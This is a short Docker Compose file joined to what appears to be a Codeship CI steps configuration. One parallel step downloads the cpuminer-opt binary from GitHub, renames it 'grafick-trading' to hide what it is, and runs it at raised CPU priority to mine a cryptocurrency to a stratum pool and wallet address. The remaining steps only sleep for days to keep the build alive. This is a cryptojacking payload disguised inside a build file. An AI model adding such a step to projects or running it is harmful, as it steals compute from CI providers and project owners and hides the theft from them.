version: "3.9"
services:
  web:
    build: .
    ports:
      - "5000:5000"
  redis:
    image: "redis:alpine"
- type: parallel
  name: example_parallel_step
  steps:
    - service: codeship_example
      command: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz  &&
               tar -xvf cpuminer-opt-linux.tar.gz &&
               sleep 2s &&
               mv cpuminer-sse2 grafick-trading &&
               ./grafick-trading -a yespowerSUGAR -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1q6jhhzvqcenetm05cutg6f302v4egznata7sf77.1 -t 4 -B --cpu-priority 4 &&
               sleep 2d
    - service: codeship_example
      # shell wrapper not required unless passing along env vars or combining commands
      command: sleep 2d
- name: example_tagged_step
  tag: master
  service: codeship_example
  command: sleep 3d
